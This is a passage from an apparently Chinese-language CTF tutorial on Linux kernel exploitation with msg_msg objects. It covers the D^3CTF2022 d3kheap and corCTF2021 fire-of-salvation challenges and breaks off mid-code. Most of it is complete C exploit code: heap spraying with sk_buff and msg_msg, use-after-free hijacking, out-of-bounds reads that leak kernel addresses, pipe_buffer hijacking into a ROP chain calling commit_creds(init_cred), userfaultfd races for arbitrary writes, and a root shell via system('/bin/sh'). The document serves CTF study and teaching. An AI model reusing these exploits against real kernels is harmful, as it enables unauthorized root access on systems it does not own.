size_t cur_search_addr = msg_queue_addr - 8;
while (kernel_offset == INVALID_KERNEL_OFFSET) {
size_t msg_offset = -1;
for (int i = DATALEN_MSG + DATALEN_SEG - 8; i >= DATALEN_MSG; i -= 8) {
if (!*(size_t *) &oob_msgbuf.mtext[i]) {
msg_offset = i - DATALEN_MSG + 8;
break;
}
}
if (msg_offset == -1) {
puts("[-] failed to find next msg.");
exit(-1);
}
cur_search_addr += msg_offset;
printf("[*] current searching addr: %p\n", cur_search_addr);
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, cur_search_addr, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak kernel addr form heap space", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
}

init_cred += kernel_offset;
commit_creds += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;
pop_rdi_ret += kernel_offset;
push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret += kernel_offset;

build_msg(fake_msg, msg_msg_addr + 0x5000, msg_msg_addr + 0x5000, 0, sizeof(msgbuf.mtext), 0, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);

if (read_msg(msqid[msg_queue_index], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
if (read_msg(msqid[0], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}

int pipe_fd[2];
pipe(pipe_fd);
pipe((int[2]) {});

size_t pipe_buffer_addr = msg_msg_addr - msg_msg_offset;
printf("[+] pipe_buffer addr: %p\n", pipe_buffer_addr);
struct pipe_buffer *pipe_buf = (void *) &fake_msg;
pipe_buf->ops = (void *) (pipe_buffer_addr + 0x100);
((struct pipe_buf_operations *) &fake_msg[0x100])->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;

size_t *rop = (size_t *) &fake_msg[0x20];
int rop_idx = 0;
rop[rop_idx++] = pop_rdi_ret;
rop[rop_idx++] = init_cred;
rop[rop_idx++] = commit_creds;
rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
rop[rop_idx++] = 0;
rop[rop_idx++] = 0;
rop[rop_idx++] = (size_t) get_shell;
rop[rop_idx++] = user_cs;
rop[rop_idx++] = user_rflags;
rop[rop_idx++] = user_sp;
rop[rop_idx++] = user_ss;

setxattr("/flag", "sky123", pipe_buf, HEAP_SIZE, 0);
close(pipe_fd[0]);
close(pipe_fd[1]);

return 0;
}
方法 2

与第一种方法不同,第二种方法相比修改 msg_msg 的结构体由 setxattr 换成了 sk_buff 。由于 sk_buff 不会被立即释放因此可以使用堆喷,在真实环境中成功率更高。

和第一种方法一样利用 msg_msg 劫持释放的 object 。不过这里由于采用 msg_msg 堆喷的方式劫持,因此不知道哪个 msg_msg 劫持了 object 。
一种解决方法是再次释放 object,然后使用 sk_buff 堆喷申请回来,同时修改 msg_msgm_ts 为一个很大的值。当获取 msg_msg 中的数据时,在 copy_msg 函数中如果我们用于读取的 buffer 的大小小于 m_ts 会返回异常,根据这个可以判断出那个 msg_msg 劫持了 object 。

1
2
3
4
5
6
7
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
...
if (src->m_ts > dst->m_ts)// 有个 size 检查
return ERR_PTR(-EINVAL);
...
}

之后参考第一种方法泄露 msg_msg 的地址,之后修复并释放 msg_msg 然后堆喷 pipe_buffer 劫持。
读取 sk_buf 泄露 pipe_buffer->ops 从而泄露内核基址。然后参考方法 1 修改 pipe_buffer 提权。

由于 sk_buff 既可以写又可以读并且不会立即释放,相对于第一种方法只能 msg_msg 读,setxattr 写来说利用方式更加容易,可以借助堆喷提升成功率,对利用环境要求更小。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sched.h>
#include <stdbool.h>
#include<ctype.h>

void bind_core(int core) {
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

int init_socket_array(int sk_socket[SOCKET_NUM][2]) {
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}
return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) {
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}
return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) {
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}
return 0;
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

bool is_kernel_text_addr(size_t addr) {
return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
// return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

void get_shell() { system("cat flag;/bin/sh"); }

int d3heap_fd;

void chunk_add() {
ioctl(d3heap_fd, 0x1234);
}

void chunk_delete() {
ioctl(d3heap_fd, 0xdead);
}

#define PRIMARY_MSG_SIZE 0x60
#define SECONDARY_MSG_SIZE 0x400
#define PIPE_NUM 256
#define HEAP_SIZE 1024
#define MSG_QUE_NUM 4096
#define MSG_TAG 0x1145141919810

size_t init_cred = 0xffffffff82c6d580;
size_t commit_creds = 0xffffffff810d25c0;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0;
size_t pop_rdi_ret = 0xffffffff810938f0;
size_t push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff812dbede;

struct {
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} msgbuf;


char fake_msg[704];

int main() {
bind_core(0);
save_status();
int sk_sockets[SOCKET_NUM][2];
init_socket_array(sk_sockets);
d3heap_fd = open("/dev/d3kheap", O_RDONLY);
int msqid[MSG_QUE_NUM];
for (int i = 0; i < MSG_QUE_NUM; i++) {
if ((msqid[i] = get_msg_queue()) < 0) {
puts("[-] mdgget failed.");
exit(-1);
}
}

chunk_add();

for (int i = 0; i < MSG_QUE_NUM; i++) {
memset(msgbuf.mtext, 'A' + (i % 26), sizeof(msgbuf.mtext));
if (write_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), MSG_TAG) < 0) {
puts("[-] msgnd failed.");
exit(-1);
}
if (i == MSG_QUE_NUM / 2) {
chunk_delete();
}
}

chunk_delete();

build_msg(fake_msg, 0, 0, 0, -1, 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
int victim_qid = -1;
for (int i = 0; i < MSG_QUE_NUM; i++) {
if (peek_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1) {
puts("[-] failed to find uaf msg_queue.");
exit(-1);
}
if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}

memset(fake_msg, '#', sizeof(fake_msg));
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG, 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (peek_msg(msqid[victim_qid], &oob_msgbuf, DATALEN_MSG, 0) < 0) {
puts("[-] failed to peek msg.");
exit(-1);
}
printf("[*] oob_msgbuf.mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("try to find nearby secondary msg", oob_msgbuf.mtext, DATALEN_MSG);

size_t nearby_msg_que = 0;
int msg_msg_offset = 0;
for (int i = sizeof(msgbuf.mtext); i < DATALEN_MSG; i += HEAP_SIZE) {
struct msg_msg *msg_msg = (void *) &oob_msgbuf.mtext[i];
printf("type: %p\n", msg_msg->m_type);
if (msg_msg->m_type == MSG_TAG && msg_msg->next == NULL
&& is_dir_mapping_addr((size_t) msg_msg->m_list.prev)
&& msg_msg->m_list.prev == msg_msg->m_list.next
&& msg_msg->m_ts == sizeof(msgbuf.mtext)) {
nearby_msg_que = (size_t) msg_msg->m_list.next;
msg_msg_offset = i + sizeof(struct msg_msg);
printf("[+] nearby msg_queue: %p\n", nearby_msg_que);
break;
}
}

if (!nearby_msg_que) {
puts("[-] failed to find nearby msg_queue.");
exit(-1);
}
if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}

build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_MSG, nearby_msg_que - 8, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (peek_msg(msqid[victim_qid], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] failed to peek msg.");
exit(-1);
}
printf("[*] oob_msgbuf.mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_msg addr", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
size_t victim_addr = *(size_t *) &oob_msgbuf.mtext[DATALEN_MSG] - msg_msg_offset;
printf("[+] victim addr: %p\n", victim_addr);

if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}
build_msg(fake_msg, victim_addr + 0x800, victim_addr + 0x800, 1, sizeof(msgbuf.mtext), 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (read_msg(msqid[victim_qid], &msgbuf, sizeof(msgbuf.mtext), 1) < 0) {
puts("[-] failed to release secondary msg.");
exit(-1);
}

int pipe_fd[PIPE_NUM][2];
for (int i = 0; i < PIPE_NUM; i++) {
if (pipe(pipe_fd[i]) < 0) {
puts("[-] failed to create pipe.");
exit(-1);
}
if (write(pipe_fd[i][1], "sky123", 6) < 0) {
puts("[-] failed to write pipe.");
exit(-1);
}
}

size_t kernel_offset = -1;
struct pipe_buffer *pipe_buf = (struct pipe_buffer *) &fake_msg;
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_sockets[i][1], &fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}
if (is_kernel_text_addr((size_t) pipe_buf->ops)) {
qword_dump("leak pipe_buf_operations addr", fake_msg, sizeof(fake_msg));
printf("[+] leak pipe_buf_operations addr: %p\n", pipe_buf->ops);
kernel_offset = (size_t) pipe_buf->ops - 0xffffffff8203fe40;
printf("[+] kernel offset: %p\n", kernel_offset);
}
}
}
if (kernel_offset == -1) {
puts("[-] failed to leak kernel addr.");
exit(-1);
}
init_cred += kernel_offset;
commit_creds += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;
pop_rdi_ret += kernel_offset;
push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret += kernel_offset;

pipe_buf->page = (void *) 0xdeadbeef;
pipe_buf->ops = (void *) (victim_addr + 0x100);
((struct pipe_buf_operations *) &fake_msg[0x100])->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;

int rop_idx = 0;
size_t *rop = (size_t *) &fake_msg[0x20];
rop[rop_idx++] = pop_rdi_ret;
rop[rop_idx++] = init_cred;
rop[rop_idx++] = commit_creds;
rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
rop[rop_idx++] = 0;
rop[rop_idx++] = 0;
rop[rop_idx++] = (size_t) get_shell;
rop[rop_idx++] = user_cs;
rop[rop_idx++] = user_rflags;
rop[rop_idx++] = user_sp;
rop[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}

for (int i = 0; i < PIPE_NUM; i++) {
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}

任意地址写(结合 userfaultfd 或 FUSE 完成 race condition write)

当我们调用 msgsnd 系统调用时,其会调用 load_msg() 将用户空间数据拷贝到内核空间中,首先是调用 alloc_msg() 分配 msg_msg 单向链表,之后才是正式的拷贝过程,即空间的分配与数据的拷贝是分开进行的。

我们不难想到的是,在拷贝时利用 userfaultfd/FUSE 将拷贝停下来,在子进程中篡改 msg_msgnext 指针,在恢复拷贝之后便会向我们篡改后的目标地址上写入数据,从而实现任意地址写。

例题:corCTF2021 fire-of-salvation

附件下载链接

一个防火墙驱动,可以添加编辑和删除规则,对应 kmalloc-4k 的 object 的添加编辑和删除。另外还有 firewall_dup 操作将流量入口或出口规则复制一份到出口或入口,即 object 指针复制一份到另一个列表,因此存在任意次 UAF。

首先创建 msg_msg 并且通过 UAF 修改 m_ts 越界读堆喷的 shm_file_data 泄露内核基址。这里由于 firewall_edit 功能在 IPNetmask 错误的时候只修改前 0x20 字节,因此不会覆盖到 next

由于本题目开启了 FG_KASLR 保护,无法通过泄露内核基址确定 commit_creds 以及相关 gadget 的地址,因此需要采用修改 task_structcred 指针为 init_cred 地址的方式提权。搜索本进程 task_struct 的方法有两种,一是通过 prctl(PR_SET_NAME, "sky123"); 修改 task_structcomm 字段然后利用类似 D^3CTF2022 - d3kheap 的方法搜索 comm 字段来定位 task_struct 。另一种方法是从 init_task 开始通过 tasks 双向链表遍历进程判断 pid 的方式定位。这里采用第二种方法。
需要注意的是为了确保 msg_msgsegnext 指针为 NULL ,在内存搜索时需要将 msg_msgseg 构造到 &task_struct.tasks - 8 的位置,当按照 task_struct.tasks.prev 遍历 tasks 链表的时候该位置很大概率为 NULL(新创建的进程都是从 init_task.tasks.prev 添加的,因此基本上第一个就是自身进程)。

之后创建一个新的 msg_queue 然后 msgsnd 添加一个 msg_msgcopy_from_user 阶段用 userfaultfd 卡住,然后 UAF 修改 next&task_struct.cred - 0x10(确保 next 为 NULL)从而写入 init_cred 地址实现提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/syscall.h>
#include <unistd.h>


void bind_core(int core) {
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

bool is_kernel_text_addr(size_t addr) {
return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
// return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

#define INVALID_KERNEL_OFFSET 0x1145141919810

const size_t kernel_addr_list[] = {
0xffffffff81c3d7a0,
0xffffffff81a0d0e0,
};

size_t kernel_offset_query(size_t kernel_text_leak) {
if (!is_kernel_text_addr(kernel_text_leak)) {
return INVALID_KERNEL_OFFSET;
}
for (int i = 0; i < sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]); i++) {
if (!((kernel_text_leak ^ kernel_addr_list[i]) & 0xFFF) && (kernel_text_leak - kernel_addr_list[i]) % 0x100000 == 0) {
return kernel_text_leak - kernel_addr_list[i];
}
}
printf("[-] unknown kernel addr: %#lx\n", kernel_text_leak);
return INVALID_KERNEL_OFFSET;
}

size_t search_kernel_offset(void *buf, int len) {
size_t *search_buf = buf;
for (int i = 0; i < len / 8; i++) {
size_t kernel_offset = kernel_offset_query(search_buf[i]);
if (kernel_offset != INVALID_KERNEL_OFFSET) {
printf("[+] kernel leak addr: %#lx\n", search_buf[i]);
printf("[+] kernel offset: %#lx\n", kernel_offset);
return kernel_offset;
}
}
return INVALID_KERNEL_OFFSET;
}

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t) PAGE_SIZE - sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t) PAGE_SIZE - sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;


void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *) ) {
long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
puts("[-] Error at: userfaultfd");
exit(-1);
}
struct uffdio_api uffdio_api = {.api = UFFD_API, .features = 0};
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
puts("[-] Error at: ioctl-UFFDIO_API");
exit(-1);
}
struct uffdio_register uffdio_register;
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
puts("[-] Error at: ioctl-UFFDIO_REGISTER");
exit(-1);
}
static pthread_t monitor_thread;
if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
puts("[-] Error at: pthread_create");
exit(-1);
}
}

typedef struct {
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
char desc[0x800];
} user_rule_t;


int firewall_fd;
enum {
INBOUND,
OUTBOUND
};

int add_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0x1337BABE, &(user_rule_t){.type = type, .idx = idx, .ip = "0.0.0.0", .netmask = "0.0.0.0"});
}

int dup_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xBAAD5AAD, &(user_rule_t){.type = type, .idx = idx});
}

int delete_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xDEADBABE, &(user_rule_t){.type = type, .idx = idx});
}

void inet_ntoa(char *buf, uint32_t val) {
sprintf(buf, "%d.%d.%d.%d", val & 0x000000FF, (val & 0x0000FF00) >> 8, (val & 0x00FF0000) >> 16, (val & 0xFF000000) >> 24);
}

int edit_rule(uint8_t idx, void *buf, uint8_t type, bool invalid) {
user_rule_t rule = {.type = type, .idx = idx};
memcpy(&rule, buf, 0x20);
if (invalid) {
strcpy(rule.ip, "invalid");
strcpy(rule.netmask, "invalid");
} else {
inet_ntoa(rule.ip, *(uint32_t *) &buf[0x20]);
inet_ntoa(rule.netmask, *(uint32_t *) &buf[0x24]);
}
memcpy(&rule.proto, &buf[0x28], 2);
memcpy(&rule.port, &buf[0x2a], 2);
memcpy(&rule.action, &buf[0x2c], 2);
return ioctl(firewall_fd, 0x1337BEEF, &rule);
}
struct {
long mtype;
char mtext[DATALEN_MSG + 0x20 - sizeof(struct msg_msgseg)];
} msgbuf;

char fake_msg[0x2000];

size_t init_cred = 0xFFFFFFFF81C33060;
size_t init_task = 0xFFFFFFFF81C124C0;
size_t cur_task;

#define TASKS_OFFSET 0x298
#define PID_OFFSET 0x398
#define CRED_OFFSET 0x540


void *handler_thread(void *arg) {
long uffd = (long) arg;
while (true) {
struct pollfd pollfd;
pollfd.fd = (int) uffd;
pollfd.events = POLLIN;
int nready = poll(&pollfd, 1, -1);
if (nready == -1) {
puts("[-] Error at: poll");
exit(-1);
}
static struct uffd_msg msg;
ssize_t nread = read((int) uffd, &msg, sizeof(msg));
if (nread == 0) {
puts("[-] Error at: EOF on userfaultfd!");
exit(EXIT_FAILURE);
}
if (nread == -1) {
puts("[-] Error at: read");
exit(-1);
}
